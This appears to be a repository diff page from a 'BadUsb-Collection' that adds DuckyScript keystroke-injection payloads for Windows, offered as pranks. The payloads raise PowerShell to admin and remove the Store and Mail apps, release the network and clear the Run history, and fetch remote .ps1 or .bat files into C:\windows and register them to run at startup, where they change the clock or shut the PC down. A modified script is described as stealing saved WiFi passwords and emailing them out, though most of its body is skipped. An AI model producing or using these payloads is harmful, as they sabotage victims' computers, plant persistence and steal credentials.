🤬
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/MoreSeriousFUN/DeleteMicrosoftStore.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Deletes the Microsoft Store
     3 +REM Version: 1.0
     4 +REM Category: Fun
     5 +DELAY 500
     6 +GUI r
     7 +DELAY 300
     8 +REM Start PowerShell as Admin
     9 +STRING powershell Start-Process powershell -Verb runAs
     10 +DELAY 300
     11 +ENTER
     12 +DELAY 500
     13 +LEFTARROW
     14 +DELAY 450
     15 +ENTER
     16 +DELAY 600
     17 +REM Deletes Microsoft Store
     18 +STRING Get-AppxPackage *windowsstore*|Remove-AppxPackage
     19 +DELAY 200
     20 +ENTER
     21 +
     22 +
     23 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/MoreSeriousFUN/DeleteWindowsMail.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Deletes the Windows Mail app.
     3 +REM Version: 1.0
     4 +REM Category: Fun
     5 +DELAY 500
     6 +GUI r
     7 +DELAY 300
     8 +REM Start PowerShell as Admin
     9 +STRING powershell Start-Process powershell -Verb runAs
     10 +DELAY 300
     11 +ENTER
     12 +DELAY 500
     13 +LEFTARROW
     14 +DELAY 450
     15 +ENTER
     16 +DELAY 600
     17 +REM Deletes Windows Mail app
     18 +STRING AppxPackage Microsoft.windowscommunicationsapps | Remove-AppxPackage
     19 +DELAY 200
     20 +ENTER
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/MoreSeriousFUN/NoMoreWifi.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: No more wifi until you turn it back on with ipconfig /renew
     3 +REM Version: 1.0
     4 +REM Category: FUN
     5 +DELAY 1000
     6 +GUI r
     7 +DELAY 100
     8 +STRING powershell -Nop -NonI -W Hidden -Exec Bypass "rp -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue; ipconfig /release"
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/MoreSeriousFUN/OnStartupChangeDateAndTime.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Creates a PowerShell script that will run on startup and change date and time after 10 minutes
     3 +REM Version: 1.0
     4 +REM Category: Serious-FUN
     5 +DELAY 750
     6 +WINDOWS d
     7 +DELAY 950
     8 +WINDOWS r
     9 +DELAY 650
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 750
     13 +LEFTARROW
     14 +ENTER
     15 +DELAY 850
     16 +ALT y
     17 +DELAY 1200
     18 +STRING $url = "https://github.com/UNC0V3R3D/ressources/blob/main/date.ps1"; $output = "C:\windows\date.ps1"; Invoke-WebRequest -Uri $url -OutFile $output;
     19 +DELAY 400
     20 +ENTER
     21 +DELAY 600
     22 +STRING New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" ` -Name "date" ` -Value "C:\windows\date.ps1"
     23 +DELAY 400
     24 +ENTER
     25 +exit
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/MoreSeriousFUN/ShutDownFun.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Creates a batch file that will run on startup and shutdown the pc after 10 minutes
     3 +REM Version: 1.0
     4 +REM Category: Serious-FUN
     5 +DELAY 750
     6 +WINDOWS d
     7 +DELAY 950
     8 +WINDOWS r
     9 +DELAY 650
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 750
     13 +LEFTARROW
     14 +ENTER
     15 +DELAY 850
     16 +ALT y
     17 +DELAY 1200
     18 +STRING $url = "https://github.com/UNC0V3R3D/ressources/blob/main/shutdown.bat"; $output = "C:\windows\927356239523.bat"; Invoke-WebRequest -Uri $url -OutFile $output;
     19 +DELAY 400
     20 +ENTER
     21 +DELAY 600
     22 +STRING New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" ` -Name "927356239523" ` -Value "C:\windows\927356239523.bat"
     23 +DELAY 400
     24 +ENTER
     25 +exit
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/PasswordStealing/StealWifiKeys_Email.txt
    1  -REM Title: Ducky WiFi Grabber
    2  -REM Description: Steals wifi passwords and sends them to your outlook email
    3  -REM Author: Zero_Sploit
    4  -REM Props: Hak5 Team
    5  -REM Version: 1.0
    6  -REM Category: Exfiltration
    7  -REM Target: Windows 10 (CMD + Powershell)
    8  -REM Attackmodes: HID
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Steals all of the saved Wifi Passwords and sends them via an outlook email.
     3 +REM Version: 1.0
     4 +REM Category: Passwords
    9 5  DEFAULT_DELAY 600
    10 6  DELAY 500
    11 7  WINDOWS r
    skipped 67 lines
Please wait...
Page is in error, reload to recover